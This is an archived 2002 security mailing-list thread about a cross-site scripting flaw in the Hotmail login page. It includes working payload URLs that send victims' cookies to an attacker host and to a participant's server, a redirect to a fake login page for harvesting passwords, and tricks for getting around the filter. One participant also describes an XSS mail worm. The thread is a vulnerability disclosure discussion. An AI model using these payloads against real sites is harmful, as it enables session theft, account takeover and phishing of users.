RE: XSS bug in hotmail login page

2002-10-08 Thread Thor Larholm 

 From: Russell Harding [mailto:[EMAIL PROTECTED]]
 Is there another way to exploit this which I am not 
 seeing? Or does MSN actually have their act together
  (in this particular case...)?
 
   -Russell
 
 P.S. Well, I suppose the real question may be this:
 Is there a way to concatenate javascript strings without + or %2B?

Sure there is, the first that springs to mind is to use the replace method
which all strings have:

var myString = hi $.replace('$','monkeyboy');
alert( myString ); // alerts hi monkeyboy

The first argument can be both a string or a regular expression.

http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=id=2fs=1cb=;sc
riptlocation.replace('http://jscript.dk/2002/10/sec/querystring.asp?$'.repl
ace('$',document.cookie));/scriptct=1033054530_setlang=,,-1,0




Regards
Thor Larholm
Jubii A/S - Internet Programmer

Re: XSS bug in hotmail login page

2002-10-08 Thread Muhammad Faisal Rauf Danka 

A lot can happen for sure, but i tried one myself, to redirect the request to some 
other webpage.
One can make a fake hotmail page asking for password storing it locally in a text file 
and then again redirect to the original hotmail page.
Usint this method one could steal passwords of hotmail/MSN users.
We have all see previously people making hotmail looking page, asking you to first 
login through it, or asking you to send your login/pass along with the login name with 
the person you want to get hacked (all nasty scams like that).
Now if it is not fixed they will have an easy way to trick them by asking them to 
visit hotmail new policy at :

http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=id=2fs=1cb=;scriptlocation.replace(http://www.ownhomepage.com/frames/hotmailfake.html;);/scriptct=1033054530_setlang=

And then have a fake setup to trick them entering their passwords at:
http://www.ownhomepage.com/frames/hotmailfake.html


Regards

Muhammad Faisal Rauf Danka

Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 
784B 0202

_
---
[ATTITUDEX.COM]
http://www.attitudex.com/
---

_
Select your own custom email address for FREE! Get [EMAIL PROTECTED] w/No Ads, 6MB, 
POP  more! http://www.everyone.net/selectmail?campaign=tag

Re: XSS bug in hotmail login page

2002-10-08 Thread Berend-Jan Wever 

If you can't get spaces in, escape them:
eval(unescape(alert('spaces%20wherever%20you%20want');));
You can encode any character you want this way.

I have some papers on XSS bugs and their implications and some tips, tricks
and tools online at my website. Might be interresting for all you wannabe
XSS-hackers and anybody who has a website or webbase application to secure
from XSS. http://spoor12.edup.tudelft.nl/

Impact for the hotmail XSS: I wrote a hotmail virus a few months back. It's
written in javascript and it abuses XSS bugs to spread itself to all people
in your addressbook  inbox. It works like a charm on IE and Netscape
(probably Mozilla too). It infects yahoo too (using another, yet
undisclosed, XSS bug in yahoo). I was working on a port to mail.com but got
bored.
Combine this mass-mailer worm with the recent download and execute any
file bugs for IE by Jelmer and friends and you've got another mass-mailin',
backdoorin', script-kiddie virus. Only this time it's not just for Outlook
but for any javascript capable browser(!)

So, Amongst the known security problems XSS poses, you can now add that XSS
bugs can lead to infection with a virus and/or a backdoor. (I hope you're
not reading this with webbased hotmail or yahoo ;)

Berend-Jan Wever
[EMAIL PROTECTED]

http://spoor12.edup.tudelft.nl/

0x0dd31337 - you know who you are ;)

- Original Message -
From: Muhammad Faisal Rauf Danka [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, October 08, 2002 14:11
Subject: Re: XSS bug in hotmail login page


 A lot can happen for sure, but i tried one myself, to redirect the request
to some other webpage.
 One can make a fake hotmail page asking for password storing it locally in
a text file and then again redirect to the original hotmail page.
 Usint this method one could steal passwords of hotmail/MSN users.
 We have all see previously people making hotmail looking page, asking you
to first login through it, or asking you to send your login/pass along with
the login name with the person you want to get hacked (all nasty scams like
that).
 Now if it is not fixed they will have an easy way to trick them by asking
them to visit hotmail new policy at :


http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=id=2fs=1cb=;sc
riptlocation.replace(http://www.ownhomepage.com/frames/hotmailfake.html;);
/scriptct=1033054530_setlang=

 And then have a fake setup to trick them entering their passwords at:
 http://www.ownhomepage.com/frames/hotmailfake.html


 Regards
 
 Muhammad Faisal Rauf Danka

 Head of GemSEC / Chief Technology Officer
 Gem Internet Services (Pvt) Ltd.
 web: www.gem.net.pk
 Key Id: 0x784B0202
 Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B
 784B 0202

 _
 ---
 [ATTITUDEX.COM]
 http://www.attitudex.com/
 ---

 _
 Select your own custom email address for FREE! Get [EMAIL PROTECTED] w/No
Ads, 6MB, POP  more! http://www.everyone.net/selectmail?campaign=tag

RE: XSS bug in hotmail login page

2002-10-08 Thread Russell Harding 

Hello, comments below:

On Mon, 7 Oct 2002, Thor Larholm wrote:

 It's very simple, you can inject arbitrary scripting to be executed by the
 user in the context of hotmail. This means that you can e.g. steal his
 cookies or, if he's logged in, write emails from his account, delete his
 mails and change his password.


  I'm not sure this is the case (severity)... Hotmail strips +'s and %2B's
from GET requests.  While you can view your own cookies easily, I'm not
sure if you can still exploit this bug.  I do know filtering these
characters prevents this sort of attack:

http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=id=2fs=1cb=;scriptdocument.location.replace('http://attacker.com/steal.cgi?'+document.cookie);/scriptct=1033054530_setlang=

Is there another way to exploit this which I am not seeing? Or does MSN
actually have their act together (in this particular case...)?

   -Russell

P.S. Well, I suppose the real question may be this:
Is there a way to concatenate javascript strings without + or %2B?



On Mon, 7 Oct 2002, Thor Larholm wrote:

  From: Peter Rdam [mailto:[EMAIL PROTECTED]]
  They didnt reacted, and im pretty curious about what
  is possible with the bug. And i actually hope that
  someone can tell me about it and maybe Microsoft will
  do something about it..

 It's very simple, you can inject arbitrary scripting to be executed by the
 user in the context of hotmail. This means that you can e.g. steal his
 cookies or, if he's logged in, write emails from his account, delete his
 mails and change his password.



 Regards
 Thor Larholm
 Jubii A/S - Internet Programmer